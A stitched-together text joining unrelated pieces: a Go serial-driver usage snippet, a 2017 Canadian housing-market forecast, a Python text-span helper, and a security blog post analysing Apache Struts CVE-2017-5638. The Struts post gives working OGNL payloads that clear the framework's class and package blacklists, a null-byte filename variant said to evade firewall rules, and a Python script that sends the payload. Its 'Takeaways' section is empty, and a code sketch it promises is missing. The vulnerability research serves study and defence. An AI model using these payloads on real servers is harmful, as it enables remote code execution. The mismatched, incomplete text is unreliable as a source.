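A usage sketch for the driver above. The import path for the drivers package, the device name, and the 8-byte command frame are placeholders (the frame merely follows the ff 55 len idx ... layout sketched in the driver's comments, not a real MegaPi command):

package main

import (
	"fmt"

	"github.com/jacobsa/go-serial/serial"

	"example.com/megapi/drivers" // placeholder module path
)

func main() {
	options := serial.OpenOptions{
		PortName:        "/dev/ttyUSB0", // placeholder device
		BaudRate:        115200,
		DataBits:        8,
		StopBits:        1,
		MinimumReadSize: 1,
	}
	drivers.SerialState.Open(options)

	// Placeholder frame: start bytes, length, index, then payload.
	msg := [8]byte{0xff, 0x55, 0x04, 0x00, 0x01, 0x02, 0x03, 0x04}
	if _, err := drivers.SerialState.Write(msg); err != nil {
		fmt.Println("write:", err)
		return
	}
	n, err := drivers.SerialState.Read()
	if err != nil {
		fmt.Println("read:", err)
		return
	}
	fmt.Printf("reply: % x\n", drivers.SerialState.Result(n))
}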
A new real estate forecast for Canada predicts ups and downs ahead in 2017: Vancouver will slump, the GTA will soar, and Alberta should see some recovery after a rocky few years.

Real estate in Canada's largest markets became increasingly unaffordable for many in 2016, and the spectre of a crash loomed. "The price of a home in Canada increased 13.0 per cent year-over-year to $558,153 in the fourth quarter of 2016 – the highest year-over-year national home price increase recorded in over a decade," stated a Royal LePage forecast released Thursday.

Among measures to ease the risk of a shock were B.C.'s new foreign buyers tax and the federal government's tightening of mortgage lending rules. At the same time, both B.C. and Ontario created new incentives for first-time home buyers. Here's a look at what 2017 has in store for Canadians from coast to coast.

Alberta

There is light at the end of the tunnel for Alberta home owners dealing with a depressed economy following the oil crash. "While we don't anticipate a strong housing rebound, we are calling 2016 as the bottom for this correctional phase of the cycle," said Royal LePage president and CEO Phil Soper in the forecast. The economic improvement is thanks to a rise in oil prices, bolstered by the OPEC agreement to cut production globally. Perhaps surprisingly, the oil slump has not ravaged housing values too badly in Alberta over the last few years, Royal LePage stated, but it has diminished demand.

House prices in Calgary are expected to stabilize this year, the Calgary Real Estate Board (CREB) said Wednesday in its annual forecast. Calgary has had the highest unemployment rate in Canada for six months straight; that needs to change in order to see true growth. "One of the key components to this turnaround in the housing market is if labour market conditions start to improve," said Ann-Marie Lurie, chief economist at CREB. "We need to start having job growth in this city before we can see a true shift in our housing market."

Saskatchewan has also taken a hit from low oil prices; however, a solid year for agriculture has kept the housing market afloat. "Economic growth in [Saskatchewan] is likely to be positive in 2017, but slightly below the Canadian average, with home prices expected to remain relatively flat in the province's two largest cities," Royal LePage predicts.

Ontario

Ontario has seen incredible growth in recent years, and that's not expected to change in 2017. The GTA saw a 16.1 per cent year-over-year spike in prices. Some areas around Toronto have seen "Vancouver-like" growth over the last year: Richmond Hill ended 2016 with home values 30 per cent higher than a year before. "There is no relief in sight for the GTA – forward momentum and supporting fundamentals in the region are that strong," said Soper.

With prices increasingly pushing homes beyond reach, first-time home buyers are also being shut out of the lower end of the market due to diminishing condo inventory. While it might seem like condos are going up on every corner of Canada's largest city, they are likely already all sold out, said Brad J. Lamb, president and CEO at Lamb Development and Brad J. Lamb Realty. There are about 670 condos for sale in Toronto this January, compared with 1,450 units last January and 2,200 in January of 2015, Lamb said.
"One of the reasons prices went up 17 per cent last year was because there was not enough product to go around and keep the market happy," said Lamb. Supply has now fallen, year over year, by more than half. "We're going to have a huge problem in prices this year going up. Last year will look like nothing compared to this year."

Lamb predicts GTA prices will only skyrocket in the coming years. "Our prices will be well in excess of Vancouver's prices in five years," said Lamb. "And there's nothing anybody can do to stop it."

British Columbia

B.C. largely dominated the real estate conversation in 2016, and in 2017 the trend will reverse as home values slide. That being said, prices are expected to recede to levels seen in early 2016 – still the highest anywhere in the country.

"Eroding affordability in B.C.'s Lower Mainland has reached unsustainable ground," said Soper. "While the cost of a home in Greater Vancouver will remain the highest in the country, a modest price reset will provide much needed relief in the Lower Mainland and help reignite overall buyer activity in the region."

While prices somewhat recede, the general mood isn't too panicked, said Dan Morrison, president of the Real Estate Board of Greater Vancouver. "The fundamentals for Vancouver are still strong – we still have more people moving here than we're building places for, interest rates are still low, the Canadian dollar is still putting Canada on sale for the rest of the world," Morrison said.

Meanwhile, prices continue to rise in Victoria due to lack of supply. "Our economy is one of the best in the country right now," Victoria real estate board chief Mike Nugent told the Canadian Press Monday. "We've got lots of jobs happening in all sectors. That's attracting everybody."

After a record-breaking year in parts of the Okanagan, Kelowna's real estate market is predicted to somewhat soften in 2017. "We're still going to see a strong market," Elton Ash, Regional Executive Vice President of RE/MAX Western Canada, told Global News Monday. "We're predicting a 4 per cent price increase on average in Kelowna and overall sales will remain relatively strong as well."

Manitoba, Quebec and Atlantic Canada

Manitoba's economy is expanding and the province is expected to see low single-digit house appreciation in 2017. Quebec's economy is expected to grow in 2017, along with the price of its homes, at least in major centres. Newfoundland and Labrador is likely to see much of the same in 2017: further home price declines along with the economy. However, its regional neighbours will see growth. "New Brunswick, Nova Scotia and Prince Edward Island are expected to achieve economic growth in the coming year, along with continued residential housing market gains," Royal LePage forecasted.
def paragraph_span(span, text):
    # Expand a (start, end) character span to the enclosing paragraph.
    # Paragraph boundaries are blank lines ("\n\n") or section headings
    # ("\n==...") in the wiki-style source text.
    i, j = span[0], span[1]
    start = rfind_pattern(r'\n(?:\n|==)', text, 0, i)
    if start == -1:
        start = 0
    elif text[start + 1] == '\n':
        # Blank-line boundary: skip over both newlines.
        start += 2
    else:
        # Heading boundary: skip past the rest of the heading line.
        start = re.compile(r'\n').search(text, start + 3).end()
    end = index_pattern(r'\n(?:\n|==)', text, j)
    return (start, end)
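The rfind_pattern and index_pattern helpers are not shown in this snippet. Below is one plausible, hypothetical implementation consistent with how they are used above (rfind_pattern returning the start of the last match before the span, index_pattern the start of the next match after it, or len(text) if there is none):

import re

def rfind_pattern(pattern, text, start, end):
    # Start index of the LAST match of `pattern` in text[start:end], or -1.
    last = -1
    for m in re.finditer(pattern, text[start:end]):
        last = start + m.start()
    return last

def index_pattern(pattern, text, pos):
    # Start index of the first match of `pattern` at or after `pos`,
    # or len(text) if the pattern never occurs again.
    m = re.compile(pattern).search(text, pos)
    return m.start() if m else len(text)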
Monday, March 27, 2017 at 12:10PM

At GDS, we've had a busy few weeks helping our clients manage the risk associated with CVE-2017-5638 (S2-045), a recently published Apache Struts server-side template injection vulnerability. As we began this work, I found myself curious about the conditions that lead to this vulnerability in the Struts library code. We often hear about the exploitation of these types of vulnerabilities, but less about the vulnerable code that leads to them. This post is the culmination of research I have done into this very topic. What I present here is a detailed code analysis of the vulnerability, as well as payloads seen in the wild and a discussion on why some work while others don't. I also present a working payload for S2-046, an alternate exploit vector that is capable of bypassing web application firewall rules that only examine request content types. I conclude with a couple of takeaways I had from this research.

For those unfamiliar with the concept of SSTI (server-side template injection), it's a classic example of an injection attack. A template engine parses what is intended to be template code, but somewhere along the way ends up parsing user input. The result is typically code execution in whatever form the template engine allows. For many popular template engines, such as Freemarker, Smarty, Velocity, Jade, and others, remote code execution outside of the engine is often possible (i.e. spawning a system shell). For cases like Struts, simple templating functionality is provided using an expression language such as Object-Graph Navigation Language (OGNL). As is the case for OGNL, it is often possible to obtain remote code execution outside of an expression engine as well. Many of these libraries do offer mechanisms to help mitigate remote code execution, such as sandboxing, but they tend to be disabled by default or trivial to bypass.

From a code perspective, the simplest condition for SSTI to exist in an application is to have user input passed into a function that parses template code (a minimal sketch of this pattern appears at the end of this post). Losing track of what functions handle values tainted with user input is an easy way to accidentally introduce all kinds of injection vulnerabilities into an application. To uncover a vulnerability like this, the call stack and any tainted data flow must be carefully traced and analyzed. This was the case to fully understand how CVE-2017-5638 works. The official CVE description reads:

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017.

This left me with the impression that the vulnerable code existed in the Jakarta Multipart parser and that it was triggered by a "#cmd=" string in the Content-Type HTTP header. Using Struts 2.5.10 as an example, we'll soon learn that the issue is far more nuanced than that. To truly grasp how the vulnerability works, I needed to do a full analysis of relevant code in the library.

Beginning With A Tainted Exception Message

An exception thrown, caught, and logged when this vulnerability is exploited reveals a lot about how this vulnerability works. As we can see in the following reproduction, which results in remote code execution, an exception is thrown and logged in the parseRequest method in the Apache commons upload library. This is because the content-type of the request didn't match an expected valid string.
We also notice that the exception message thrown by this library includes the invalid content-type header supplied in the HTTP request. This in effect taints the exception message with user input.

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=16cuhw2qmanji1axbayhcp10kn;Path=/struts2-showcase
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(8.1.16.v20140903)
Content-Length: 11

testwebuser

The caller responsible for invoking the parseRequest method that generates the exception is in a class named JakartaMultiPartRequest. This class acts as a wrapper around the Apache commons fileupload library, defining a method named processUpload that calls its own version of the parseRequest method on line 91. This method creates a new ServletFileUpload object on line 151 and calls its parseRequest method on line 147.

core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java:

 90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException {
 91:     for (FileItem item : parseRequest(request, saveDir)) {
 92:         LOG.debug("Found file item: [{}]", item.getFieldName());
 93:         if (item.isFormField()) {
 94:             processNormalFormField(item, request.getCharacterEncoding());
 95:         } else {
 96:             processFileField(item);
 97:         }
 98:     }
 99: }
[..snip..]
144: protected List<FileItem> parseRequest(HttpServletRequest servletRequest, String saveDir) throws FileUploadException {
145:     DiskFileItemFactory fac = createDiskFileItemFactory(saveDir);
146:     ServletFileUpload upload = createServletFileUpload(fac);
147:     return upload.parseRequest(createRequestContext(servletRequest));
148: }
149:
150: protected ServletFileUpload createServletFileUpload(DiskFileItemFactory fac) {
151:     ServletFileUpload upload = new ServletFileUpload(fac);
152:     upload.setSizeMax(maxSize);
153:     return upload;
154: }

Looking at the stacktrace, we can see that the processUpload method is called by JakartaMultiPartRequest's parse method on line 67. Any thrown exceptions from calling this method are caught on line 68 and passed to the method buildErrorMessage. Several paths exist for calling this method depending on the class of the exception thrown, but the result is always that this method is called. In this case the buildErrorMessage method is called on line 75.

core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java:

 64: public void parse(HttpServletRequest request, String saveDir) throws IOException {
 65:     try {
 66:         setLocale(request);
 67:         processUpload(request, saveDir);
 68:     } catch (FileUploadException e) {
 69:         LOG.warn("Request exceeded size limit!", e);
 70:         LocalizedMessage errorMessage;
 71:         if (e instanceof FileUploadBase.SizeLimitExceededException) {
 72:             FileUploadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e;
 73:             errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()});
 74:         } else {
 75:             errorMessage = buildErrorMessage(e, new Object[]{});
 76:         }
 77:
 78:         if (!errors.contains(errorMessage)) {
 79:             errors.add(errorMessage);
 80:         }
 81:     } catch (Exception e) {
 82:         LOG.warn("Unable to parse request", e);
 83:         LocalizedMessage errorMessage = buildErrorMessage(e, new Object[]{});
 84:         if (!errors.contains(errorMessage)) {
 85:             errors.add(errorMessage);
 86:         }
 87:     }
 88: }

Since the JakartaMultiPartRequest class doesn't define the buildErrorMessage method, we look to the class that it extends which does: AbstractMultiPartRequest.

core/src/main/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequest.java:

 98: protected LocalizedMessage buildErrorMessage(Throwable e, Object[] args) {
 99:     String errorKey = "struts.messages.upload.error." + e.getClass().getSimpleName();
100:     LOG.debug("Preparing error message for key: [{}]", errorKey);
101:
102:     return new LocalizedMessage(this.getClass(), errorKey, e.getMessage(), args);
103: }

The LocalizedMessage that it returns defines a simple container-like object. The important details here are:

- The instance's textKey is set to struts.messages.upload.error.InvalidContentTypeException.
- The instance's defaultMessage is set to the exception message tainted with user input.

Next in the stacktrace, we can see that JakartaMultiPartRequest's parse method is invoked in MultiPartRequestWrapper's constructor method on line 86. The addError method called on line 88 checks to see if the error has already been seen, and if not it adds it to an instance variable that holds a collection of LocalizedMessage objects.

core/src/main/java/org/apache/struts2/dispatcher/multipart/MultiPartRequestWrapper.java:

 77: public MultiPartRequestWrapper(MultiPartRequest multiPartRequest, HttpServletRequest request,
 78:                                String saveDir, LocaleProvider provider,
 79:                                boolean disableRequestAttributeValueStackLookup) {
 80:     super(request, disableRequestAttributeValueStackLookup);
[..snip..]
 85:     try {
 86:         multi.parse(request, saveDir);
 87:         for (LocalizedMessage error : multi.getErrors()) {
 88:             addError(error);
 89:         }

On the next line of our stacktrace, we see that the Dispatcher class is responsible for instantiating a new MultiPartRequestWrapper object and calling the constructor method above. The method called here is named wrapRequest and is responsible for detecting if the request's content type contains the substring "multipart/form-data" on line 801. If it does, a new MultiPartRequestWrapper is created on line 804 and returned.

core/src/main/java/org/apache/struts2/dispatcher/Dispatcher.java:

794: public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException {
795:     // don't wrap more than once
796:     if (request instanceof StrutsRequestWrapper) {
797:         return request;
798:     }
799:
800:     String content_type = request.getContentType();
801:     if (content_type != null && content_type.contains("multipart/form-data")) {
802:         MultiPartRequest mpr = getMultiPartRequest();
803:         LocaleProvider provider = getContainer().getInstance(LocaleProvider.class);
804:         request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup);
805:     } else {
806:         request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup);
807:     }
808:
809:     return request;
810: }

At this point in our analysis, our HTTP request has been parsed and our wrapped request object (MultiPartRequestWrapper) holds an error (LocalizedMessage) with our tainted default message and a textKey set to struts.messages.upload.error.InvalidContentTypeException.

Calling Struts' File Upload Interceptor

The rest of the stacktrace doesn't provide anything terribly useful to us to continue tracing data flow.
However, we have a clue for where to look next. Struts processes requests through a series of interceptors. As it turns out, an interceptor named FileUploadInterceptor is part of the default “stack” that Struts is configured to use. As we can see on line 242, the interceptor checks to see if our request object is an instance of the class MultiPartRequestWrapper. We know that it is because the Dispatcher previously returned an instance of this class. The interceptor continues to check if the MultiPartRequestWrapper object has any errors on line 261, which we already know it does. It then calls LocalizedTextUtil’s findText method on line 264, passing in several arguments such as the error’s textKey and our tainted defaultMessage. core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java: 237 : public String intercept ( ActionInvocation invocation ) throws Exception { 238 : ActionContext ac = invocation . getInvocationContext ( ) ; 239 : 240 : HttpServletRequest request = ( HttpServletRequest ) ac . get ( ServletActionContext . HTTP_REQUEST ) ; 241 : 242 : if ( ! ( request instanceof MultiPartRequestWrapper ) ) { 243 : if ( LOG . isDebugEnabled ( ) ) { 244 : ActionProxy proxy = invocation . getProxy ( ) ; 245 : LOG . debug ( getTextMessage ( " struts.messages.bypass.request " , new String [ ] { proxy . getNamespace ( ) , proxy . getActionName ( ) } ) ) ; 246 : } 247 : 248 : return invocation . invoke ( ) ; 249 : } 250 : [ . . snip . . ] 259 : MultiPartRequestWrapper multiWrapper = ( MultiPartRequestWrapper ) request ; 260 : 261 : if ( multiWrapper . hasErrors ( ) ) { 262 : for ( LocalizedMessage error : multiWrapper . getErrors ( ) ) { 263 : if ( validation ! = null ) { 264 : validation . addActionError ( LocalizedTextUtil . findText ( error . getClazz ( ) , error . getTextKey ( ) , ActionContext . getContext ( ) . getLocale ( ) , error . getDefaultMessage ( ) , error . getArgs ( ) ) ) ; 265 : } 266 : } 267 : } Following Localized Text This is where things start to get interesting. A version of the LocalizedTextUtil’s method findText is called that tries to find an error message to return based on several factors. I have omitted the large method definition because the comment below accurately describes it. The findText method call is invoked where: aClassName is set to AbstractMultiPartRequest. aTextName is set to the error’s textKey, which is struts.messages.upload.error.InvalidContentTypeException. Locale is set to the ActionContext’s locale. defaultMessage is our tainted exception message as a string. Args is an empty array. valueStack is set to the ActionContext’s valueStack. 397 : /** 398 : * <p> 399 : * Finds a localized text message for the given key, aTextName. Both the key and the message 400 : * itself is evaluated as required. The following algorithm is used to find the requested 401 : * message : 402 : * </p> 403 : * 404 : * <ol> 405 : * <li>Look for message in aClass' class hierarchy. 406 : * <ol> 407 : * <li>Look for the message in a resource bundle for aClass</li> 408 : * <li>If not found, look for the message in a resource bundle for any implemented interface</li> 409 : * <li>If not found, traverse up the Class' hierarchy and repeat from the first sub-step</li> 410 : * </ol></li> 411 : * <li>If not found and aClass is a {@link ModelDriven} Action, then look for message in 412 : * the model's class hierarchy (repeat sub-steps listed above).</li> 413 : * <li>If not found, look for message in child property. 
This is determined by evaluating 414 : * the message key as an OGNL expression. For example, if the key is 415 : * <i>user.address.state</i>, then it will attempt to see if "user" can be resolved into an 416 : * object. If so, repeat the entire process fromthe beginning with the object's class as 417 : * aClass and "address.state" as the message key.</li> 418 : * <li>If not found, look for the message in aClass' package hierarchy.</li> 419 : * <li>If still not found, look for the message in the default resource bundles.</li> 420 : * <li>Return defaultMessage</li> 421 : * </ol> Because a resource bundle is not found defining an error message for struts.messages.upload.error.InvalidContentTypeException, this process ends up invoking the method getDefaultMessage on line 573: core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 570 : // get default 571 : GetDefaultMessageReturnArg result ; 572 : if ( indexedTextName = = null ) { 573 : result = getDefaultMessage ( aTextName , locale , valueStack , args , defaultMessage ) ; 574 : } else { 575 : result = getDefaultMessage ( aTextName , locale , valueStack , args , null ) ; 576 : if ( result ! = null & amp ; & amp ; result . message ! = null ) { 577 : return result . message ; 578 : } 579 : result = getDefaultMessage ( indexedTextName , locale , valueStack , args , defaultMessage ) ; 580 : } The getDefaultMessage method in the same class is responsible making one last ditch effort of trying to find a suitable error message given a key and a locale. In our case, it still fails and takes our tainted exception message and calls TextParseUtil’s translateVariables method on line 729. core/src/main/java/com/opensymphony/xwork2/util/LocalizedTextUtil.java: 714 : private static GetDefaultMessageReturnArg getDefaultMessage ( String key , Locale locale , ValueStack valueStack , Object [ ] args , 715 : String defaultMessage ) { 716 : GetDefaultMessageReturnArg result = null ; 717 : boolean found = true ; 718 : 719 : if ( key ! = null ) { 720 : String message = findDefaultText ( key , locale ) ; 721 : 722 : if ( message = = null ) { 723 : message = defaultMessage ; 724 : found = false ; // not found in bundles 725 : } 726 : 727 : // defaultMessage may be null 728 : if ( message ! = null ) { 729 : MessageFormat mf = buildMessageFormat ( TextParseUtil . translateVariables ( message , valueStack ) , locale ) ; 730 : 731 : String msg = formatWithNullDetection ( mf , args ) ; 732 : result = new GetDefaultMessageReturnArg ( msg , found ) ; 733 : } 734 : } 735 : 736 : return result ; 737 : } An OGNL Expression Data Sink As it turns out, TextParseUtil’s translateVariables method is a data sink for expression language evaluation. Just as the method’s comment explains, it provides simple template functionality by evaluating OGNL expressions wrapped in instances of ${…} and %{…}. Several versions of the translateVariables method are defined and called, with the last evaluating the expression on line 166. core/src/main/java/com/opensymphony/xwork2/util/TextParseUtil.java: 34 : /** 35 : * Converts all instances of ${...}, and %{...} in <code>expression</code> to the value returned 36 : * by a call to {@link ValueStack#findValue(java.lang.String)}. If an item cannot 37 : * be found on the stack (null is returned), then the entire variable ${...} is not 38 : * displayed, just as if the item was on the stack but returned an empty string. 
39:  *
40:  * @param expression an expression that hasn't yet been translated
41:  * @param stack value stack
42:  * @return the parsed expression
43:  */
44: public static String translateVariables(String expression, ValueStack stack) {
45:     return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString();
46: }
[..snip..]
152: public static Object translateVariables(char[] openChars, String expression, final ValueStack stack, final Class asType, final ParsedValueEvaluator evaluator, int maxLoopCount) {
153:
154:     ParsedValueEvaluator ognlEval = new ParsedValueEvaluator() {
155:         public Object evaluate(String parsedValue) {
156:             Object o = stack.findValue(parsedValue, asType);
157:             if (evaluator != null && o != null) {
158:                 o = evaluator.evaluate(o.toString());
159:             }
160:             return o;
161:         }
162:     };
163:
164:     TextParser parser = ((Container) stack.getContext().get(ActionContext.CONTAINER)).getInstance(TextParser.class);
165:
166:     return parser.evaluate(openChars, expression, ognlEval, maxLoopCount);
167: }

With this last method call, we have traced an exception message tainted with user input all the way to the evaluation of OGNL.

Payload Analysis

A curious reader might be wondering how the exploit’s payload works. To start, let us attempt to supply a simple OGNL payload that returns an additional header. We need to include the unused variable assignment at the beginning so that the Dispatcher’s check for a “multipart/form-data” substring passes and our request gets parsed as a file upload.

POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: ${(#_='multipart/form-data').(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}
Content-Length: 0

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=1wq4m7r2pkjqfak2zaj4e12kn;Path=/struts2-showcase
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html
[..snip..]

Huh? It didn’t work. A look at our logs shows that a warning was logged:

17-03-24 12:48:30,904 WARN [qtp18233895-25] ognl.SecurityMemberAccess (SecurityMemberAccess.java:74) - Package of target [[email protected]2] or package of member [public void javax.servlet.http.HttpServletResponseWrapper.addHeader(java.lang.String,java.lang.String)] are excluded!

As it turns out, Struts offers blacklisting functionality for class member access (i.e., class methods). By default, the following class list and package-name patterns are used:

core/src/main/resources/struts-default.xml:

41: <constant name="struts.excludedClasses"
42:           value="
43:           java.lang.Object,
44:           java.lang.Runtime,
45:           java.lang.System,
46:           java.lang.Class,
47:           java.lang.ClassLoader,
48:           java.lang.Shutdown,
49:           java.lang.ProcessBuilder,
50:           ognl.OgnlContext,
51:           ognl.ClassResolver,
52:           ognl.TypeConverter,
53:           ognl.MemberAccess,
54:           ognl.DefaultMemberAccess,
55:           com.opensymphony.xwork2.ognl.SecurityMemberAccess,
56:           com.opensymphony.xwork2.ActionContext">
57: [..snip..]
63: <constant name="struts.excludedPackageNames" value="java.lang.,ognl,javax,freemarker.core,freemarker.template">

To better understand the original OGNL payload, let us try a simplified version that actually works:

POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: ${(#_='multipart/form-data').(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}
Content-Length: 0

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=avmifel7x66q9cmnsrr8lq0s;Path=/struts2-showcase
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Struts-Exploit-Test: GDSTEST
Content-Type: text/html
[..snip..]

As we can see, this one does indeed work. But how is it bypassing the blacklisting we saw earlier? What this payload does is empty the lists of excluded package names and classes, thereby rendering the blacklist useless. It does this by first fetching the current container associated with the OGNL context and assigning it to the “container” variable. You may notice that the class com.opensymphony.xwork2.ActionContext is included in the blacklist above. How is this possible, then? The blacklist doesn’t catch it because we aren’t referencing a class member, but rather a key that already exists in the OGNL value stack (defined in core/src/main/java/com/opensymphony/xwork2/ActionContext.java:102). The reference to an instance of this class is already made for us, and the payload takes advantage of that.

Next, the payload gets the container’s instance of OgnlUtil, which allows us to invoke methods that return the current excluded classes and package names. The final step is simply to get and clear each blacklist and execute whatever unrestricted evaluations we want.

An interesting point to make here is that once the blacklists have been emptied, they remain empty until overwritten by code or until the application has been restarted. I found this to be a common pitfall when attempting to reproduce certain payloads found in the wild or documented in other research. Some payloads failed to work because they assumed the blacklists had already been emptied, which would likely have occurred during earlier testing of different payloads. This emphasizes the importance of resetting application state when running dynamic tests.

You may have also noticed that the original exploit’s payload is a bit more complicated than the one presented here. Why does it perform extra steps, such as checking a _memberAccess variable and calling a method named setMemberAccess? It may be an attempt to leverage another technique to clear each blacklist, in case the first technique didn’t work. The setMemberAccess method is called with a default instance of the MemberAccess class, which in effect clears each blacklist too. I could confirm that this technique works in Struts 2.3.31 but not in 2.5.10. I am still unsure, however, about the purpose of the ternary operator that checks for and conditionally assigns _memberAccess. During testing I did not observe this variable to evaluate as true.
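For repeatable testing, the request above is easy to script. Below is a minimal sketch, not from the original research, using Python's requests library and assuming the same vulnerable struts2-showcase instance at localhost:8080 used throughout this post:

# Minimal sketch: deliver the simplified blacklist-clearing payload via the
# Content-Type header and check for the injected response header.
# Assumptions: vulnerable Struts 2.5.10 showcase at localhost:8080; requests installed.
import requests

payload = (
    "${(#_='multipart/form-data')."
    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
    ".addHeader('X-Struts-Exploit-Test','GDSTEST'))}"
)

r = requests.post(
    "http://localhost:8080/struts2-showcase/fileupload/doUpload.action",
    headers={"Content-Type": payload},
)
# A successful evaluation reflects the injected header back to us.
print(r.status_code, r.headers.get("X-Struts-Exploit-Test"))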
Other Exploit Vectors

Other exploit vectors exist for this vulnerability as of 2.5.10. This is because any exception message tainted with user input that doesn’t have an associated error key will be evaluated as OGNL. For example, supplying an upload filename containing a null byte will cause an InvalidFileNameException to be thrown from the Apache Commons FileUpload library. This also bypasses a web application firewall rule that only examines the Content-Type header. The %00 in the request below should be URL-decoded first. The result is an exception message that is tainted with user input.

POST /struts2-showcase/ HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=---------------------------1313189278108275512788994811
Content-Length: 570

-----------------------------1313189278108275512788994811
Content-Disposition: form-data; name="upload"; filename="a%00${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}"
Content-Type: text/html

test
-----------------------------1313189278108275512788994811--

HTTP/1.1 404 No result defined for action com.opensymphony.xwork2.ActionSupport and result input
Set-Cookie: JSESSIONID=hu1m7hcdnixr1h14hn51vyzhy;Path=/struts2-showcase
X-Struts-Exploit-Test: GDSTEST
Content-Type: text/html;charset=ISO-8859-1
[..snip..]

2017-03-24 15:21:29,729 WARN [qtp1168849885-26] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:82) - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: a\0${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}
    at org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:189) ~[commons-fileupload-1.3.2.jar:1.3.2]
    at org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:259) ~[commons-fileupload-1.3.2.jar:1.3.2]
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processFileField(JakartaMultiPartRequest.java:105) ~[struts2-core-2.5.10.jar:2.5.10]
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:96) ~[struts2-core-2.5.10.jar:2.5.10]
    at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10]
    at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10]
    at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10]

As you can see from the stacktrace, control flow diverges in the processUpload method of the JakartaMultiPartRequest class. Instead of an exception being thrown when calling the parseRequest method on line 91, an exception is thrown when calling the processFileField method and getting the name of a file item on line 105.
core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java:

90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException {
91:     for (FileItem item : parseRequest(request, saveDir)) {
92:         LOG.debug("Found file item: [{}]", item.getFieldName());
93:         if (item.isFormField()) {
94:             processNormalFormField(item, request.getCharacterEncoding());
95:         } else {
96:             processFileField(item);
97:         }
98:     }
99: }
[..snip..]
101: protected void processFileField(FileItem item) {
102:     LOG.debug("Item is a file upload");
103:
104:     // Skip file uploads that don't have a file name - meaning that no file was selected.
105:     if (item.getName() == null || item.getName().trim().length() < 1) {
106:         LOG.debug("No file has been uploaded for the field: {}", item.getFieldName());
107:         return;
108:     }
109:
110:     List<FileItem> values;
111:     if (files.get(item.getFieldName()) != null) {
112:         values = files.get(item.getFieldName());
113:     } else {
114:         values = new ArrayList<>();
115:     }
116:
117:     values.add(item);
118:     files.put(item.getFieldName(), values);
119: }

Takeaways

